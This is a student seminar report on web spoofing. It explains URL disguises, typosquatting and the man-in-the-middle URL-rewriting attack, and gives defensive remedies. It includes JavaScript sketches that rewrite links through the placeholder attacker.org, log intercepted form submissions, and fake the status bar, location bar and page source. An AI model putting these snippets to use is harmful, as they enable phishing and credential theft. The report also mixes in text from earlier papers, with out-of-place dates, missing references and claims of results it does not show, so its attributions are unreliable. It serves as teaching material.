
SEMINAR REPORT

ON

WEB SPOOFING

Submitted in

Partial Fulfillment of the Requirements for the

Degree of

Bachelor of Engineering

IN

COMPUTER SCIENCE & ENGINEERING

Session: 2008-09

Submitted To: Miss Shubhra Saxena (Lecturer, Computer Science)

Submitted By: Varun Kumar, VIIIth Sem (C.S.E.)

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING

Yagyavalkya Institute of Technology,


Sitapura, Jaipur

25th March, 2009

ACKNOWLEDGEMENTS

I express my sincere thanks to Mr. Kailash Maheshwari (Head of the Department, Computer
Science and Engineering, YIT), Mr. Lokesh Sharma, and Miss Shubhra Saxena for their kind
co-operation in presenting the seminar.

I also extend my sincere thanks to all other faculty members of the Computer Science and
Engineering Department for their co-operation and encouragement.

Varun Kumar
CERTIFICATE

This is to certify that Mr. Varun Kumar from COMPUTER SCIENCE AND ENGINEERING
has successfully delivered a seminar on the topic “Web Spoofing” and has submitted a
satisfactory report on it in partial fulfillment of the requirements for the degree of
B.E. (Comp. Sc.) according to the syllabus of the UNIVERSITY OF RAJASTHAN, JAIPUR
during the academic year 2008-09.

Date: 25th March 2009

Mr. Kailash Maheshwari (H.O.D., C.S.E. & I.T.)

Miss Shubhra Saxena (Seminar Guide)
Preface

The Web is currently the pre-eminent medium for electronic service delivery to remote
users. As a consequence,
authentication of servers is more important than ever. Even sophisticated users base their
decision whether or not to trust a site on browser cues—such as location bar information, SSL
icons, SSL warnings, certificate information,
response time, etc.
In the seminal work on web spoofing, Felten et al showed how a malicious server could
forge some of these cues—but using approaches that are no longer reproducible. However,
subsequent evolution of Web tools has not only patched security holes—it has also added new
technology to make pages more interactive and vivid. In this paper, we explore the feasibility of
web spoofing using this new technology—and we show how, in many cases, every one of the
above cues can be forged.
CONTENTS

1. Acknowledgements

2. Preface

3. Certificate

4. Contents

5. Introduction

6. Spoofing Attacks

7. How the Attack Works

8. Background
   1. Anatomy of a Browser Window
   2. Web Spoofing

9. Previous Work
   1. Princeton
   2. UCSB
   3. CMU

10. Consequences
    1. Surveillance
    2. Tampering
    3. Spoofing the Whole Web

11. Remedies
    Short-term & Long-term Solutions

12. Limitations

13. Conclusions

14. References and Bibliography
Introduction

Nearly every aspect of social, government, and commercial activity is moving into electronic
settings. The World Wide Web is the de facto standard medium for these services. Inherent
properties of the physical world make it sufficiently difficult to forge a convincing storefront or
ATM that successful attacks create long-cited anecdotes. As a consequence, users of physical
services—stores, banks, newspapers—have developed a reasonably effective intuition of when to
trust that a particular service offering is exactly what it appears to be. However, moving from
“bricks and mortar” to electronic settings introduces a fundamentally new problem: bits are
malleable. Does this intuition still suffice for the new electronic world? When one clicks on a
link that says “Click Here to go to TrustedStore.Com,” how does one know that is where one has
been taken?
Answering these questions requires examining how users make judgments about whether
to trust a particular Web page for a particular service. Indeed, the issue of user trust judgment is
largely overlooked; research addressing how to secure Web servers, how to secure the
client-server connection, and how to secure client-side management risks being rendered moot if
the final transmission of trust information to the human user is neglected.
Users now routinely encounter Web (and Web-like) content as the alleged manifestation
of some specific entity—a newspaper, a store, a government agency. How do users evaluate
whether or not this manifestation is genuine? We briefly discuss some items that have re-surfaced
recently.

_ Convincing HTML.
Once upon a time, e-mail consisted solely of text. However, mail tools have become sufficiently
powerful that HTML attached to an email will be automatically rendered at the receiver’s site. A
malicious party can forge a news article by downloading legitimate HTML from a Web server,
editing it, and
attaching it to email.
One might expect that recipients should know that Web pages should be viewed via Web
transfers, not via email. However, law enforcement colleagues of ours report that this technique
is sufficiently convincing to be a continuing source of problems.

_ Convincing URL.
More sophisticated users may base their decisions on the URL their browser tells them they are
visiting. However, RFC 1738 permits more flexibility than many people realize. For a basic
example, the hostname can be an IP address.
As a case in point, in 1999, Gary D. Hoke created HTML that produced a realistic-looking
Bloomberg press release pertaining to PairGain Technologies, Inc., posted it on angelfire.com,
and posted a link to this page on a stock discussion bulletin board. Since the presence of
angelfire.com instead of bloomberg.com in the URL might give away the hoax, Hoke disguised
the link by using Angelfire’s IP address instead:
http://204.238.155.37/biz2/headlines/topfin.html
Hoke’s limited disguise was sufficient to drive the price of the stock up by a third (and also land
him in legal trouble). However, the technology permits even more convincing disguises. For one
thing, on many platforms (including all the Netscape installations we tested, except Macs), the IP
address can be expressed as a single decimal number (e.g., 3438189349) instead of the more
familiar dotted notation—further disguising things.
Furthermore, as has been pointed out repeatedly, RFC 1738 permits a username and password to
precede the machine name in the hostname portion of a URL. Hoke could have made his hoax
even more convincing by finding (or setting up) a server that accepts arbitrary user names and
passwords, and giving a URL of the form
http://bloomberg.com:biz@3438189349/headlines/topfin.html
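To make the decimal-address trick concrete, the sketch below (plain JavaScript; the helper name
ipToDecimal is only illustrative) shows how a dotted address maps to the single decimal number
quoted above.

```javascript
// Convert a dotted IP address into the single decimal number that many
// browsers of that era also accepted in URLs. Helper name is illustrative.
function ipToDecimal(dotted) {
  var parts = dotted.split(".");          // e.g. ["204", "238", "155", "37"]
  return ((parseInt(parts[0], 10) * 256 + parseInt(parts[1], 10)) * 256 +
           parseInt(parts[2], 10)) * 256 + parseInt(parts[3], 10);
}

// 204.238.155.37 -> 3438189349, matching the Angelfire example above.
ipToDecimal("204.238.155.37");
```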

_ Typejacking.
URLs that appear more standard—but contain hostnames deceptively similar to the hostnames
users expect—are a trick long used by many e-commerce vendors (primarily pornographers) to
lure in unwitting customers.
However, this technique can also be used maliciously. As we recently saw in the headlines,
attackers established a clone of the PayPal Web site at the hostname paypai, and used email to
lure unsuspecting users to log in—and reveal their PayPal passwords. The fact that many mailers
let a user simply click on a link, instead of pasting or typing it into a browser, and that in many
fonts a lower-case “i” is indistinguishable from a lower-case “l”, facilitated this attack.
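As a small illustration of the kind of deceptive link described here (the hostnames are the ones
from the PayPal incident above; the snippet itself is only a sketch), the visible link text and the
actual destination need not agree:

```javascript
// The text the victim reads says "paypal", but the href uses the look-alike
// hostname "paypai"; in many fonts the two are hard to tell apart.
document.write('<a href="http://www.paypai.com/">http://www.paypal.com/</a>');
```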

_ SSL to whom?
Secure Sockets Layer (SSL) is touted as the solution to secure Web connections and server
impostors. However, even if a user can figure out how to examine the certificate testifying to a
server’s identity, it is not clear whether this information provides sufficient grounds for trust. For
example, the Palm Computing
“secure” web site is protected by an SSL certificate registered to Modus Media. Is Modus Media
authorized to act for Palm Computing? (It turns out, yes. But how is the user to know?)
It is against this background that we started our work. The current visual signals that a browser
provides do not appear
to provide enough information for many trust judgments the user needs to make. But before we
examine how to extend the browser user interface to handle things like security attribute
certificates or delegation for servers, we need to examine whether the insufficient information
the browsers do provide is reliable. The seminal web spoofing work of Felten et al showed that,
in 1996, a malicious site could forge many of these clues. Subsequent researchers reported
difficulty reproducing these results. This scenario raises the question: What’s still spoofable
today, in 2001?
Our answer: for standard browser installations, just about everything: including the existence of
SSL sessions and the
alleged certificates supporting them.
To return to our earlier question: how does one know the click has really taken one to
TrustedStore.com? One cannot.
On common Netscape and Internet Explorer platforms, if one surfs with JavaScript enabled, an
adversary site can
convincingly spoof the clues and appropriate behavior.
Section 2 establishes the background: the elements of Web pages, Web surfing, and advanced
content tools. Section 3
discusses previous efforts in this area. Section 4 presents the sequence of techniques that we
developed. Section 5
sketches some interesting extensions of these techniques. Section 6 concludes with some avenues
for future work.

Spoofing Attacks
In a spoofing attack, the attacker creates misleading context in order to trick the victim
into making an inappropriate security-relevant decision. A spoofing attack is like a con game: the
attacker sets up a false but convincing world around the victim. The victim does something that
would be appropriate if the false world were real. Unfortunately, activities that seem reasonable
in the false world may have disastrous effects in the real world.
Spoofing attacks are possible in the physical world as well as the electronic one. For
example, there have been several incidents in which criminals set up bogus automated-teller
machines, typically in the public areas of shopping malls. The machines would accept ATM
cards and ask the person to enter their PIN code. Once the machine had the victim’s PIN, it could
either eat the card or “malfunction” and return the card. In either case, the criminals had enough
information to copy the victim’s card and use the duplicate. In these attacks, people were fooled
by the context they saw: the location of the machines, their size and weight, the way they were
decorated, and the appearance of their electronic displays. People using computer systems often
make security-relevant decisions based on contextual cues they see. For example, you might
decide to type in your bank account number because you believe you are visiting your bank’s
Web page. This belief might arise because the page has a familiar look, because the bank’s URL
appears in the browser’s location line, or for some other reason. To appreciate the range and
severity of possible spoofing attacks, we must look more deeply into two parts of the definition
of spoofing: security-relevant decisions and context.

Security-relevant Decisions
By “security-relevant decision,” we mean any decision a person makes that might lead to
undesirable results such as a breach of privacy or unauthorized tampering with data. Deciding to
divulge sensitive information, for example by typing in a password or account number, is one
example of a security-relevant decision. Choosing to accept a downloaded document is a
security-relevant decision, since in many cases a downloaded document is capable of containing
malicious elements that harm the person receiving the document. Even the decision to accept
the accuracy of information displayed by your computer can be security-relevant. For example, if
you decide to buy a stock based on information you get from an online stock ticker, you are
trusting that the information provided by the ticker is correct. If somebody could present you
with incorrect stock prices, they might cause you to
engage in a transaction that you would not have otherwise made, and this could cost you money.

Context
A browser presents many types of context that users might rely on to make decisions. The
text and pictures on a Web page might give some impression about where the page came from;
for example, the presence of a corporate logo implies that the page originated at a certain
corporation.
The appearance of an object might convey a certain impression; for example, neon green text on
a purple background probably came from Wired magazine. You might think you’re dealing with
a popup window when what you are seeing is really just a rectangle with a border and a color
different from the surrounding parts of the screen. Particular graphical items like file-open dialog
boxes are immediately recognized as having a certain purpose. Experienced Web users react to
such cues in the same way that experienced drivers react to stop signs without reading them. The
names of objects can convey context. People often deduce what is in a file by its name.
Is manual.doc the text of a user manual? (It might be another kind of document, or it might not
be a document at all.) URLs are another example. Is MICR0S0FT.COM the address of a large
software company? (For a while that address pointed to someone else entirely. By the way, the
round symbols in MICR0S0FT here are the number zero, not the letter O.) Was dole96.org Bob
Dole’s 1996 presidential campaign? (It was not; it pointed to a parody site.)
People often get context from the timing of events. If two things happen at the same time,
you naturally think they are related. If you click over to your bank’s page and a
username/password dialog box appears, you naturally assume that you should type the name and
password that you use for the bank. If you click on a link and a document immediately starts
downloading, you assume that the document came from the site whose link you clicked on.
Either assumption could be wrong.
If you only see one browser window when an event occurs, you might not realize that the event
was caused by another window hiding behind the visible one.
Modern user-interface designers spend their time trying to devise contextual cues that will guide
people to behave appropriately, even if they do not explicitly notice the cues. While this is
usually beneficial, it can become dangerous when people are accustomed to relying on context
that is not always correct.

TCP and DNS Spoofing


Another class of spoofing attack, which we will not discuss here, tricks the user’s
software into an inappropriate action by presenting misleading information to that software.
Examples of such attacks include TCP spoofing, in which Internet packets are sent with forged
return addresses, and DNS spoofing, in which the attacker forges information about which
machine names correspond to which network addresses. These other spoofing attacks are well
known, so we will not discuss them further.

Web Spoofing
Web spoofing is a kind of electronic con game in which the attacker creates a convincing
but false copy of the entire World Wide Web. The false Web looks just like the real one: it has all
the same pages and links. However, the attacker controls the false Web, so that all network traffic
between the victim’s browser and the Web goes through the attacker.
How the Attack Works
The key to this attack is for the attacker’s Web server to sit between the victim and the
rest of the Web. This kind of arrangement is called a “man in the middle attack” in the security
literature.

URL Rewriting
The attacker’s first trick is to rewrite all of the URLs on some Web page so that they
point to the attacker’s server rather than to some real server. Assuming the attacker’s server is on
the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to
the front of the URL. For example,
http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com. (The
URL rewriting technique has been used for other reasons by several other Web sites, including
the Anonymizer and the Zippy filter.) Figure 1 shows what happens when the
victim requests a page through one of the rewritten URLs. The victim’s browser requests the
page from www.attacker.org, since the URL starts with http://www.attacker.org. The remainder
of the URL tells the attacker’s server where on the Web to go to get the real document.
Figure 1: An example Web transaction during a Web spoofing attack. The victim requests
a Web page. The following steps occur: (1) the victim’s browser requests the page from
the attacker’s server; (2) the attacker’s server requests the page from the real server; (3) the
real server provides the page to the attacker’s server; (4) the attacker’s server rewrites the
page; (5) the attacker’s server provides the rewritten version to the victim.

Once the attacker’s server has fetched the real document needed to satisfy the request, the
attacker rewrites all of the URLs in the document into the same special form by splicing
http://www.attacker.org/ onto the front. Then the attacker’s server provides the rewritten page to
the victim’s browser.
Since all of the URLs in the rewritten page now point to www.attacker.org, if the
victim follows a link on the new page, the page will again be fetched through the attacker’s
server. The victim remains trapped in the attacker’s false Web, and can follow links forever
without leaving it.
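A minimal sketch of this rewriting step, in plain JavaScript, follows. It assumes the attacker’s
server has already fetched the real page as an HTML string; http://www.attacker.org is the
placeholder hostname used throughout this report.

```javascript
// Sketch of the rewriting step described above: every absolute URL in the
// fetched page is prefixed with the attacker's hostname, so all subsequent
// requests flow back through the attacker's server.
var ATTACKER = "http://www.attacker.org/";

function rewritePage(html) {
  // Prefix href, src, and form action attributes that hold absolute URLs.
  return html.replace(/(href|src|action)\s*=\s*"(https?:\/\/[^"]*)"/gi,
    function (match, attr, url) {
      return attr + '="' + ATTACKER + url + '"';
    });
}

// Example: a link to http://home.netscape.com becomes
// http://www.attacker.org/http://home.netscape.com after rewriting.
```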

Forms
If the victim fills out a form on a page in a false Web, the result appears to be handled properly.
Spoofing of forms works naturally because forms are integrated closely into the basic Web
protocols: form submissions are encoded in Web requests and the replies are ordinary HTML.
Since any URL can be spoofed, forms can also be spoofed.
When the victim submits a form, the submitted data goes to the attacker’s server. The attacker’s
server can observe and even modify the submitted data, doing whatever malicious editing it
desires, before passing it on to the real server. The attacker’s server can also modify the data
returned in response to the form submission.
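The following sketch (Node.js-style JavaScript, offered only as an illustrative analogue, since the
report does not describe the attacker’s actual server-side implementation) shows the
man-in-the-middle step for form data: the submission is recorded and then forwarded to the real
server named inside the rewritten URL.

```javascript
// A man-in-the-middle sketch for form handling (illustrative only):
// submitted data is captured, optionally modified, then forwarded to the
// real server named inside the rewritten URL.
var http = require("http");

http.createServer(function (clientReq, clientRes) {
  // Rewritten URLs look like /http://home.netscape.com/login, so the real
  // target is everything after the leading slash.
  var realUrl = clientReq.url.slice(1);
  var body = "";

  clientReq.on("data", function (chunk) { body += chunk; });
  clientReq.on("end", function () {
    if (clientReq.method === "POST") {
      console.log("captured form data:", body);   // the surveillance step
    }
    // Forward the (possibly edited) submission to the real server and relay
    // the response; rewriting of the returned page is omitted here.
    var upstream = http.request(realUrl, { method: clientReq.method },
      function (realRes) { realRes.pipe(clientRes); });
    upstream.end(body);
  });
}).listen(8080);
```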
“Secure” connections don’t help
One distressing property of this attack is that it works even when the victim requests a
page via a “secure” connection. If the victim does a “secure” Web access (a Web access using
the Secure Sockets Layer) in a false Web, everything will appear normal: the page will be
delivered, and the secure connection indicator (usually an image of a lock or key) will be turned
on. The victim’s browser says it has a secure connection because it does have one. Unfortunately
the secure connection is to www.attacker.org and not to the place the victim thinks it is.
The victim’s browser thinks everything is fine: it was told to access a URL at
www.attacker.org so it made a secure connection to www.attacker.org. The
secure-connection indicator only gives the victim a false sense of security.

Starting the Attack


To start an attack, the attacker must somehow lure the victim into the attacker’s false
Web. There are several ways to do this. An attacker could put a link to a false Web onto a popular
Web page. If the victim is using Web-enabled email, the attacker could email the victim a pointer
to a false Web, or even the contents of a page in a false Web. Finally, the attacker could trick a
Web search engine into indexing part of a false Web.

Completing the Illusion


The attack as described thus far is fairly effective, but it is not perfect. There is still some
remaining context that can give the victim clues that the attack is going on. However, it is
possible for the attacker to eliminate virtually all of the remaining clues of the attack’s existence.
Such evidence is not too hard to eliminate because browsers are very customizable. The ability
of a Web page to control browser behavior is often desirable, but when the page is hostile it can
be dangerous.

The Status Line


The status line is a single line of text at the bottom of the browser window that displays
various messages, typically about the status of pending Web transfers.
The attack as described so far leaves two kinds of evidence on the status line. First, when the
mouse is held over a Web link, the status line displays the URL the link points to. Thus, the
victim might notice that a URL has been rewritten. Second, when a page is being fetched, the
status line briefly displays the name of the server being contacted. Thus, the victim might notice
that www.attacker.org is displayed when some other name was expected. The attacker can cover
up both of these cues by adding a JavaScript program to every rewritten page. Since JavaScript
programs can write to the status line, and since it is possible to bind JavaScript actions to the
relevant events, the attacker can arrange things so that the status line participates in the con
game, always showing the victim what would have been on the status line in the real Web. This
makes the spoofed context even more convincing.
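A sketch of this status-line trick in plain JavaScript follows; window.status was honoured by the
browsers of that era (modern browsers ignore writes to it), and the function name spoofStatus is
only illustrative.

```javascript
// When the mouse is over a rewritten link, show the URL the victim expects
// instead of the real (rewritten) one.
function spoofStatus(link, expectedUrl) {
  link.onmouseover = function () {
    window.status = expectedUrl;   // e.g. "http://home.netscape.com/"
    return true;                   // returning true suppresses the default text
  };
  link.onmouseout = function () {
    window.status = "";
    return true;
  };
}
```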

The Location Line


The browser’s location line displays the URL of the page currently being shown. The
victim can also type a URL into the location line, sending the browser to that URL. The attack as
described so far causes a rewritten URL to appear in the location line, giving the victim a
possible indication that an attack is in progress.
This clue can be hidden using JavaScript. A JavaScript program can hide the real location line
and replace it with a fake location line that looks right and is in the expected place. The fake
location line can show the URL the victim expects to see. The fake location line can also accept
keyboard input, allowing the victim to type in URLs normally. The JavaScript program can
rewrite typed-in URLs before they are accessed.
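The sketch below illustrates the fake location line in plain JavaScript, under the assumption (true
for the browsers discussed here) that pop-up feature strings such as location=no are honoured;
the function names are illustrative.

```javascript
// Open a window without the real location bar, then draw a text input at the
// top that shows the expected URL and rewrites anything the victim types.
function openSpoofedWindow(rewrittenUrl) {
  return window.open(rewrittenUrl, "spoofed",
    "location=no,menubar=no,toolbar=no,status=yes");
}

function installFakeLocationLine(expectedUrl) {
  var bar = document.createElement("input");
  bar.value = expectedUrl;                        // what the victim expects to see
  bar.style.cssText = "position:absolute;top:0;left:0;width:100%";
  bar.onkeydown = function (e) {
    if (e.keyCode === 13) {                       // Enter: reroute via the attacker
      window.location.href = "http://www.attacker.org/" + bar.value;
      return false;
    }
  };
  document.body.insertBefore(bar, document.body.firstChild);
}
```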

Viewing the Document Source


Popular browsers offer a menu item that allows the user to examine the HTML source for
the currently displayed page. A user could possibly look for rewritten URLs in the HTML source,
and could therefore spot the attack.
The attacker can prevent this by using JavaScript to hide the browser’s menu bar, replacing it with
a menu bar that looks just like the original. If the user chose “view document source” from the
spoofed menu bar, the attacker would open a new window to display the original (non-rewritten)
HTML source.
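A sketch of the spoofed “view source” behaviour follows, assuming the attacker’s server ships the
original (non-rewritten) HTML along with the rewritten page; the function name
showSpoofedSource is illustrative.

```javascript
// Show the original (non-rewritten) HTML when the victim picks the spoofed
// "View Source" menu item, instead of the rewritten markup actually received.
function showSpoofedSource(originalHtml) {
  var w = window.open("", "viewsource", "menubar=no,toolbar=no");
  var pre = w.document.createElement("pre");
  pre.appendChild(w.document.createTextNode(originalHtml));
  w.document.body.appendChild(pre);
}
```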

Viewing Document Information


A related clue is available if the victim chooses the browser’s “view document
information” menu item. This will display information including the document’s URL. As above,
this clue can be spoofed by replacing the browser’s menu bar. This leaves no remaining visible
clues to give away the attack.

Background
Nearly all Internet users are familiar with the look and feel of Web pages and Web
surfing. In this section, we quickly introduce the elements and the underlying technology, to
establish a common terminology for the rest of the paper.

1 Anatomy of Browser Window


We start by quickly reviewing the elements of a browser window, using Netscape’s
“Classic” format. (See Figure 1.) The top line—with “File, Edit...” tags—is the menu bar. The
next line—with “Back, Forward...” buttons— is the tool bar. Below the tool bar is the location
bar, containing additional buttons as well as the location line, which displays the currently
visited URL. Below the location bar is the personal bar. The main window is next; at the bottom,
the status bar contains the SSL icon—which indicates whether or not an SSL session is
established—as well as the status line, which indicates various status information, such as the
URL associated with the hyperlink underneath the cursor. An input field is the portion of a Web
page that collects input from users.

Interaction
In a normal browser window, many of these elements are not static. Rather, user
operations—such as moving a mouse over or clicking on an element—cause some corresponding
reaction, such as displaying a pop-up menu. Typing into the location line and hitting return
causes the browser to load that page.

Surfing
In the typical act of browsing, the user selects (via clicking a link, or typing a URL) a
Web site; that server returns an HTML file which the browser renders. Potentially, the file causes
the browser to fetch and load other files from that server and other servers.
In a typical SSL session, the browser and server encrypt transmissions using shared session keys.
The existence of an SSL session is indicated by the SSL icon; depending on configuration and
platform, entering and exiting an SSL session (as well as, potentially, other relevant SSL events)
triggers the display of a warning window, usually with “OK” or “OK, Cancel, Help” buttons.

2 Web Spoofing
For this paper, we offer this working definition of web spoofing: when malicious action
causes the reality of the browsing session to differ significantly from the mental model a
sophisticated user has of that session. In our work, we confine this malicious action to content
from a conspiracy of servers: e.g., the server that offers the fake “click here for
TrustedStore.Com” link, and the server that offers the faked pages. In particular, we do not
permit

Figure 1 Elements of a typical browser window.


the adversarial servers to have signed scripts, and we will regard the user’s browser and
computing platform to be out of the reach of an adversary. (Although, when one thinks of the
many non-Netscape and non-Adobe sites that say “click here for the latest version of Netscape”
or “click here to get Acrobat,” Web spoofing could enable some very interesting platform
attacks.) In a typical Web spoofing attack, the attacker presents the client carefully designed web
pages, and tricks the client into believing that he is communicating with the real server. Web
spoofing is possible because the information which the server provides to the user is collected
and displayed by the browser. Even in SSL sessions, the user judges whether a connection is
secure based on information like the SSL icon, warning windows, location information, and
certificates. But the user does not receive this information directly; rather, he draws conclusions
from what the browser appears to tell him.

Advanced Content Tools


The key to Web spoofing is the fact that simple “hypertext markup” (the “HT” of
“HTML”) has never been good enough. Web developers have continually wanted more
interaction and flash than simple hypertext markup provides, and have developed a sequence of
ways to embed executable content in Web pages.
Currently, the primary parameters here are:
_ the language of the executable,
_ and the location where it runs.

For languages, Java and JavaScript are two that are commonly used. For location, the
primary choice is at the client or at the server. Examples of server-side executables—acting
under requests coming from the client side (but not necessarily from the user)—are servlets and
CGI scripts. For client-side execution, Dynamic HTML (DHTML) has come to be the widely-
accepted catch-all term for using HTML, Cascading Style Sheets (CSS), JavaScript, and other
techniques to create vivid, interactive pages that depend primarily on client-side execution.
It is true that the emergence of executable Web content coincided with an increased focus on
security—since, without further countermeasures, the act of browsing could cause an unwitting
client to download and execute malicious code. However, this security work has been concerned
with how to prevent malicious code from stealing sensitive information from the local disk or
other web pages the client browses, and from tampering with the data that client has or shares
with other servers. (For example, both Java applets and JavaScript by default have almost no
access to local files.) Ironically, this security focus is completely inappropriate for Web spoofing,
where the goal of the content is not to illegally modify client-side data, but rather to mislead the
client, so that he/she gives the sensitive data out by mistake. Too often, traditional security
models do not include user trust judgment!

Previous Work

1. Princeton
As early as 1996, Felten et al at Princeton originated the term web spoofing
and explored spoofing attacks on Netscape Navigator and Microsoft Internet Explorer that
allowed an attacker to create a “shadow copy” of the true web. When the victim accesses the
shadow Web through the attacker’s servers, the attacker can monitor all of the victim’s activities
and get or modify the information the victim enters, including passwords or credit card numbers.
Source code is not available; according to the paper, the attack used JavaScript to rewrite
the hyperlink information shown on the status bar; to hide the real location bar and replace it
with a fake one that also accepts keyboard input, allowing the victim to type in URLs normally
(which then get rewritten to go to the attacker’s machine); and to replace the Document Source
button on the menu bar (to show the source the victim expects, not the real source). Apparently
unable to spoof the SSL icon, the Princeton attack spoofed SSL by having the user open a real
SSL session to the attacker’s machine.

2. UCSB
Subsequently, De Paoli et al at UCSB [4] tried to repeat the Princeton attack, but could no
longer fake the location bar of Netscape Navigator using JavaScript. However, De Paoli did
show how the features in Java and JavaScript can be used to launch two kinds of attacks in
standard browsers. One attack uses a Java applet to collect and send information back to its
server. A client downloads a honey-pot HTML document that embeds a spy applet with its stop
method overridden (although this enabling technique has since been deprecated). From then on,
every time the client launches a new web page with an embedded Java applet, a new Java thread
starts. But since the stop method of the spy applet is overridden, the spy thread continues running
—and collects information on the new client-side Java threads, and sends them back to the
attacker. The other attack uses a Java applet to detect when the victim visits a certain website,
then displays an impostor page for that site in order to steal sensitive information, such as credit
card numbers.

3. CMU
In 1996, Tygar and Whitten from CMU [20] demonstrated how a Java applet or similar
remote execution can be used as a trojan horse. The Java applet could be inserted into a client
machine through a bogus remote page and pop up a dialog window similar to the true login
window. With an active text field on top of the image, the trojan horse applet would capture
the keyboard input and transfer it to the attacker’s machine. Tygar and Whitten also gave a way
to prevent these attacks: window personalization. None of these papers investigated how to forge
SSL connections, when no SSL connection exists.

CONSEQUENCES
Since the attacker can observe or modify any data going from the victim to Web servers,
as well as control all return traffic from Web servers to the victim, the attacker has many
possibilities. These include surveillance and tampering.

-Surveillance
The attacker can passively watch the traffic, recording which pages the victim visits and
the contents of those pages. When the victim fills out a form, the entered data is transmitted to a
Web server, so the attacker can record that too, along with the response sent back by the server.
Since most on-line commerce is done via forms, this means the attacker can observe any account
numbers or passwords the victim enters. As we will see below, the attacker can carry out
surveillance even if the victim has a “secure” connection (usually via Secure Sockets Layer) to
the server, that is, even if the victim’s browser shows the secure-connection icon (usually an
image of a lock or a key).

-Tampering
The attacker is also free to modify any of the data traveling in either direction between
the victim and the Web. The attacker can modify form data submitted by the victim. For
example, if the victim is ordering a product on-line, the attacker can change the product number,
the quantity, or the ship-to address.
The attacker can also modify the data returned by a Web server, for example by inserting
misleading or offensive material in order to trick the victim or to cause antagonism between the
victim and the server.

Spoofing the Whole Web


You may think it is difficult for the attacker to spoof the entire World Wide Web, but it is
not. The attacker need not store the entire contents of the Web. The whole Web is available
on-line; the attacker’s server can just fetch a page from the real Web when it needs to provide a copy
of the page on the false Web.

Remedies
Web spoofing is a dangerous and nearly undetectable security attack that can be carried
out on today’s Internet. Fortunately there are some protective measures you can take.

Short-term Solution
In the short run, the best defense is to follow a three-part strategy:
1. disable JavaScript in your browser so the attacker will be unable to hide the evidence of the
attack;
2. make sure your browser’s location line is always visible;
3. pay attention to the URLs displayed on your browser’s location line, making sure they always
point to the server you think you’re connected to.
This strategy will significantly lower the risk of attack, though you could still be
victimized if you are not conscientious about watching the location line.
At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing and other security
attacks, so we recommend that you disable them. Doing so will cause you to lose some useful
functionality, but you can recoup much of this loss by selectively turning on these features when
you visit a trusted site that requires them.

Long-term Solution
We do not know of a fully satisfactory long-term solution to this problem.
Changing browsers so they always display the location line would help, although users would
still have to be vigilant and know how to recognize rewritten URLs. This is an example of a
“trusted path” technique, in the sense that the browser is able to display information for the user
without possible interference by untrusted parties. For pages that are not fetched via a secure
connection, there is not much more that can be done. For pages fetched via a secure connection,
an improved secure-connection indicator could help. Rather than simply indicating a secure
connection, browsers should clearly say who is at the other end of the connection. This
information should be displayed in plain language, in a manner intelligible to novice users; it
should say something like “Microsoft Inc.” rather than “www.microsoft.com.” Every approach
to this problem seems to rely on the vigilance of Web users. Whether we can realistically expect
everyone to be vigilant all of the time is debatable.

Limitations

1. The scenario: I was unable to present the complete scenario of web spoofing as far as the
practical field is concerned. This is partly due to limited knowledge of programming languages
such as Java, which would be needed for a better understanding of code-level spoofing and for
working against advanced tools like antiviruses and antispyware.

2. Fake interaction: I was unable to examine a fake encounter in practice.

3. The limited availability of books also bounded my approach.


Conclusions

In 2001, the original Princeton attacks may not be directly reproducible; but inspired by
them, we have shown even more extensive spoofing is now possible. Research in computer
science, perhaps more than other fields, requires saying things in the language of each
component of one’s audience. One component is only convinced by seeing real code work. As
Tygar and Whitten point out, customization is an effective way to prevent web spoofing.
Although unsigned JavaScript can detect the platform and browser the client is using, it cannot
(yet) detect the detailed window settings which may affect the browser display.

The initial motivation was not to attack but to defend: to “build a better browser” that, for
example, could clearly indicate the security attributes of a server (and so enable clients to
securely use server-hardening techniques). We hope to use our understanding of spoofing to build
something that might be unspoofable.
References

[1] E. W. Felten, D. Balfanz, D. Dean and D. Wallach. Web Spoofing: An Internet Con Game.
Technical Report 54-96 (revised). Department of Computer Science, Princeton University.
February 1997.

[2] R. J. Barbalace. “Making something look hacked when it isn’t.” The Risks Digest, 21.16,
December 2000.

[3] Dynamic HTML Lab. http://www.webreference.com/dhtml/.

[4] Carl Ellison. Personal communication, September 2000.
